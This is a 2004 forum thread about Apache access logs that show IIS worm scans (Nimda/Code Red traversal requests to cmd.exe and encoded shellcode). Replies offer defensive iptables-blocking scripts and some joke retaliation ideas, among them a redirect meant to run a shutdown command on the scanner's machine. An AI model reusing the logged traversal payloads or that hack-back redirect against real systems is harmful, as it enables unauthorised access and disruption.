# Does this mean someone is trying to do something nasty?

## HomerSimpson

I have a home apache2 server running so I can get my email remotely via squirrelmail. I am getting ready to do a web page for myself and noticed this in my access log

```
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "CONNECT 198.77.14.70:802 HTTP/1.0" 405 238 "-" "-"

198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "POST http://198.77.14.70:802/ HTTP/1.0" 200 1456 "-" "-"

195.199.79.221 - - [13/Jan/2004:23:55:25 -0500] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 238 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:33 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "CONNECT 198.77.14.70:802 HTTP/1.0" 405 238 "-" "-"

198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "POST http://198.77.14.70:802/ HTTP/1.0" 200 1456 "-" "-"

195.199.79.221 - - [13/Jan/2004:23:55:25 -0500] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 238 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:33 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
```

Are they trying to exploit some hole in IIS or Apache on Windows? Can this hurt me in any way? Should I worry?

Thx

----------

## TheCoop

those are just scans by script kiddies looking for an IIS system to crack. they cant hurt apache at all. In fact, ive put a 50MB random file in /scripts/root.exe etc, so when they try to get it they get a 50MB file down their throats  :Smile: 

----------

## HomerSimpson

I notice that I am getting a lot more port scan alerts from my router. I deleted the last one so I can't reconcile the times with the apache logs but it fits with what you said.

Thanks for the reassurance.

----------

## db_404

Looks like NIMDA (or the like), so yes it's an IIS exploit.  Seem to be getting less common (at least on the machines I watch), but you'll still see one once in a while.

So in this instance it's not a problem. However always make sure you are taking suitable precautions if you are exposing a service to the internet.

----------

## HomerSimpson

 *db_404 wrote:*   

> ... However always make sure you are taking suitable precautions if you are exposing a service to the internet.

 

My skills for getting myself into trouble are better than my skills for keeping myslef out of trouble atm. I am reading and leanring how to do stuff and then reading how to secure it. 

I just read the Gentoo security guide and did a few things but I am relying on a lot of defaults. I am relatively conscious about security when I configure things but certainly the details and subtleties are beyond me at this point. I will learn but it take this old guy a while.

Thanks for your input   :Smile: 

----------

## schism39401

 *Quote:*   

> 
> 
> My skills for getting myself into trouble are better than my skills for keeping myslef out of trouble atm. 

 

lol...I know how you feel there!!!

----------

## cakes

it looks like requests from an automated scanner like nikto (which, incidentally is in portage). It may be a good idea to emerge it and run a scan against yourself, it may pick up something you are unaware of. However, i believe apache is fairly secure by default, a current version at least!

----------

## slartibartfasz

 *TheCoop wrote:*   

> those are just scans by script kiddies looking for an IIS system to crack. they cant hurt apache at all. In fact, ive put a 50MB random file in /scripts/root.exe etc, so when they try to get it they get a 50MB file down their throats 

 

haha - good one, i think i'll try that too - guess i'll just redirect everything that matches .exe and _vti_  :Wink: 

----------

## gonzalo

 *slartibartfasz wrote:*   

>  *TheCoop wrote:*   those are just scans by script kiddies looking for an IIS system to crack. they cant hurt apache at all. In fact, ive put a 50MB random file in /scripts/root.exe etc, so when they try to get it they get a 50MB file down their throats  
> 
> haha - good one, i think i'll try that too - guess i'll just redirect everything that matches .exe and _vti_ 

 

.ida to   :Cool: 

----------

## tomk

Or you could symlink them to /dev/random to really annoy the script kiddies.

----------

## nevynxxx

 *tomk wrote:*   

> Or you could symlink them to /dev/random to really annoy the script kiddies.

 

I know nothing bout this but that would give them an infinate random stream to download wouldn't it? hehehe

----------

## jondkent

I'd have never thought about using /dev/random, excellant idea, gonna set that up right now

Cheers

Jon

----------

## TheCoop

actually its /dev/urandom, /dev/random doesnt do anything

----------

## gonzalo

Are these lines ok for commonapache2.conf ?

```

<IfModule mod_alias.c>  

RedirectMatch permanent .*/scripts/root.exe.* /dev/urandom

RedirectMatch permanent .*/MSADC/root.exe.* /dev/urandom

RedirectMatch permanent .*system32/cmd.exe.* /dev/urandom

RedirectMatch permanent .*MSOffice/cltreq.asp.* /dev/urandom

RedirectMatch permanent .*_vti_bin/owssvr.dll.* /dev/urandom

RedirectMatch permanent .*_vti_bin/shtml.exe/_vti_rpc.* /dev/urandom

RedirectMatch permanent .*_vti_inf.html.* /dev/urandom

RedirectMatch permanent .*/default.ida.* /dev/urandom

</IfModule>

```

----------

## Senso

Are you sure it's not gonna clog your CPU if you get too many NIMDA requests? What's gonna stop /dev/urandom from outputting crap ad infinitum?

----------

## gonzalo

 *Senso wrote:*   

> Are you sure it's not gonna clog your CPU if you get too many NIMDA requests? What's gonna stop /dev/urandom from outputting crap ad infinitum?

 

I don't know for sure. May be it's better a normal error file.

But i wanted to know if the lines are ok though  :Wink: Last edited by gonzalo on Fri Jan 16, 2004 12:24 pm; edited 1 time in total

----------

## fleed

Besides clogging up your CPU it will also clog up your connection, depending on the attacking side's bandwidth. I think linking to /dev/urandom might be a good joke but dunno about using it long term.

----------

## vdboor

Well, you might piss-off script kiddies, but you're also asking for attention. I'd keep a low profile, and run a https website, with http authorisation.

----------

## gonzalo

You are right.

This one is simpler and saves some bandwidth

```

RedirectMatch "/nsiislog\.dll" http://fake.domain

RedirectMatch "/cmd\.exe" http://fake.domain

RedirectMatch "/root\.exe" http://fake.domain

RedirectMatch "/shell\.exe" http://fake.domain

RedirectMatch "/default\.ida" http://fake.domain

```

----------

## tomk

 *TheCoop wrote:*   

> actually its /dev/urandom, /dev/random doesnt do anything

 

Whoops that what I meant

----------

## jonaswidarsson

 *nevynxxx wrote:*   

>  *tomk wrote:*   Or you could symlink them to /dev/random to really annoy the script kiddies. 
> 
> I know nothing bout this but that would give them an infinate random stream to download wouldn't it? hehehe

 Hmmm... Bandwidth?

----------

## tomk

As people have said this isn't really a solution, it was (half) meant as a joke. The main problems being that it's going to waste your CPU and bandwith. Another problem is that these 'attacks' are often not being run from the scsript kiddies computer, but on one that they've hacked into and left a script running that attempts to attack ISS servers, if it succeeds then another script will be run to exploit the security hole. Other than logging the IP and letting the ISP know that one of there customers has been hacked or is hacking you, there's not much you can do. Just ignore it and don't use rubbish software with massive security holes in it.

----------

## Oopsz

Use iptables.

RedirectMatch "/nsiislog\.dll" http://die.php

RedirectMatch "/cmd\.exe" http://die.php

RedirectMatch "/root\.exe" http://die.php

RedirectMatch "/shell\.exe" http://die.php

RedirectMatch "/default\.ida" http://die.php

then

die.php

```
<html><head><title>

Bye.

</title></head>

<body><div align=center>

<?php

$iptables = "/sbin/iptables";

$ip = getenv("REMOTE_ADDR");

$blockline = $iptables." -I INPUT -s ".$ip." -p all -j DROP";

echo $blockline;

system("echo \"$blockline\" >> /usr/local/bin/web-blocked-hosts-raw");

system("echo \"$blockline\" >> /home/httpd/ipblock.sh");

?>

</div></body></html>
```

/root/clean.sh

```
#!/bin/bash

echo '' > /usr/local/bin/web-blocked-hosts

/root/clean.pl

echo '#!/bin/bash' > /usr/local/bin/web-blocked-hosts.sh

cat /usr/local/bin/web-blocked-hosts >> /usr/local/bin/web-blocked-hosts.sh

/home/httpd/ipblock.sh

echo '#!/bin/bash' > /home/httpd/ipblock.sh
```

Perl script to remove dupe entries

/root/clean.pl

```
#!/usr/bin/perl

open (DB, "</usr/local/bin/web-blocked-hosts-raw") or die $!; 

open (DBOUT, ">/usr/local/bin/web-blocked-hosts") or die $!; 

while (<DB> ) {

   $seen{$_} = 1; 

} 

while (($url, $junk) = each %seen) {

   print DBOUT $url; 

} 

close DB; 

close DBOUT; 
```

chmod all the scripts to +x, chown ipblock.sh and web-blocked-hosts-raw to apache:apache, and add clean.sh to the root crontab every ten minutes or so.  Add /usr/local/bin/web-blocked-hosts.sh to /etc/conf.d/local.start to preserve blocked addresses between reboots.

----------

## Lews_Therin

Could I theoretically use

```

RedirectMatch "/nsiislog\.dll" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe

RedirectMatch "/cmd\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe

RedirectMatch "/root\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe

RedirectMatch "/shell\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe

RedirectMatch "/default\.ida" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe 
```

To...notify...the admins of those systems? To those of you who are wondering, this will download the Arabic version of winxp SP1(128mb).

----------

## DopeGhoti

You might perhaps redirect them to a tool to remove the virus/worm from their system, like this one, rather than beating them over the head with huge downloads.

----------

## Lews_Therin

Same idea, except the file is different. But would that work correctly so I don't have to get all those lines in error_log?

----------

## vdboor

 *Oopsz wrote:*   

> Use iptables.
> 
> RedirectMatch "/nsiislog\.dll" http://die.php
> 
> RedirectMatch "/cmd\.exe" http://die.php
> ...

 

very interesting, even though you might need to fix those redirect links  :Razz: 

...but there is something else I'm worried about: how to you run this script with root privileges? All my scripts run with the same restrictions as my webserver.

it might be a good idea to use sudo here.

----------

## fleed

Or you could post the list of blocked ips to a file which then gets read by a root cron job that parses it and puts the blocks in place.

----------

## pakman

You could *theoretically* use:

http://127.0.0.1/c/winnt/system32/cmd.exe?/%47L%20%47R%20%47Y%20%47C+shutdown

As the redirect target and reboot them with their own medicine, or run windowsupdate.exe or similar. Of course in reality you could get sued for this so its not a great idea (it is technically unauthorised access, and you might be running it on some huge companies ecommerce server). Amusing though, I think it was origonally mentioned on bugtraq a few years back, the idea being to shut down IIS but I forget the windows commandline for that  :Smile: 

----------

## gonzalo

RedirectMatch "/default\.ida" is not working, i'm still getting

GET /default.ida?XXXXXX on my logs. Any idea?

----------

## Oopsz

 *vdboor wrote:*   

>  *Oopsz wrote:*   Use iptables.
> 
> RedirectMatch "/nsiislog\.dll" http://die.php
> 
> RedirectMatch "/cmd\.exe" http://die.php
> ...

 

No, no, the php script runs as apache:apache.  

The shell script it creates has to be run in a root cronjob.

----------

## ptitman

i quite often get the "GET /default.ida?XXXXX..." .

  so far it has been runned by software, but still, i created that file and edited it with 

```
 <script>

                function foo(){

                        var i;

                        for(i=0;i<1000;i++){

                                alert("whichever message you want");

                        }

                }

        </script>

        <body  onload="foo();">

```

   I'm just waiting for someone to run it from its browser   :Twisted Evil: 

----------

## dvc5

Here's a script created by dreamer that uses IP tables to drop packets from "infected" boxes:

```
#!/bin/bash

#written by dreamer     02-03-2004

#quick'n dirty script to filter infected ipadresses from apache logs and

#block them with help of iptables.

#If manager is a valid emailadres ( or local user ) an email is send to

#this user every time a new ipadress is added to the firewall.

#This makes it ideal for a daily cronjob or so...

#enjoy! :-)

#

  

#global settings

#where email is send.. ( leave empty if you don't want any mail )

manager=root@localhost

#temp dir

temp_dir=/var/tmp

#iptables Chain to append the rule to

chain=INPUT

#action to take after a rule matches

action=DROP

  

#some pre-running stuff

if [ ! -f .blocklist ]

then

        touch .blocklist

fi

  

#compile a list of infected ip's

#this wil get most of the shit, i'm not sure if it wil catch ALL....

#grep error /var/log/apache2/error_log | cut -d' ' -f8 | cut -d] -f1 >> $temp_dir/blocklist_chaos.tmp

grep script /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

grep exe /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

grep dll /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

grep exe  /var/log/apache2/ssl_access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

grep "default.ida" /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

  

#sort these ip's and remove duplicates, afterwards remove blocklist_chaos.tmp

cat  $temp_dir/blocklist_chaos.tmp | sort | uniq >  $temp_dir/blocklist.tmp

rm  $temp_dir/blocklist_chaos.tmp

  

#see if there are any new ip's since last run

new_ip=( $(diff .blocklist $temp_dir/blocklist.tmp | grep '>' | cut -d' ' -f2) )

  

#remove LAN ip's (192.168.0.0/24 ) from the blocklist.

#Comment if you don't trust your own LAN ;-)

new_ip=( $(echo ${new_ip[@]##192.168.0.*}) )

  

#if there is at least one new infected ip....

if (( $((${#new_ip[@]})) > 0 ))

then

        #make tempfile the new permanent blocklist

        mv  $temp_dir/blocklist.tmp .blocklist

  

        # add new ip's with iptables

        for element in $(seq 0  $((${#new_ip[@]} - 1)))

        do

                /sbin/iptables -A $chain -s "${new_ip[$element]}" -j $action

  

                #for proper display in mail

                new_ip[$element]=$(echo ${new_ip[$element]}"\t\t(" $(grep "${new_ip[$element]}" /var/log/apache2/access_log |tail -1| cut -d] -f2)")\n")                                                                                 

        done

  

        #mail new ip's to manager

        if [[ $manager != "" ]]

        then

                echo -e "At" $(date +%A' '%d' '%b' '%T) "those infected ip's where added to the firewall:\n "${new_ip[@]}\

                | /usr/sbin/sendmail -F "IP Block List" $manager

        fi

else

        rm  $temp_dir/blocklist.tmp

fi
```

Of course you'll need to be able to read root's mail for the reports.   :Laughing:   And here's the thread where it's discussed in more detail. The grep lines are the meat of the log processing, and can be customized to your liking. I found that grepping for error in the error logs blocked my own ip, so I took it out.   :Shocked: 

----------

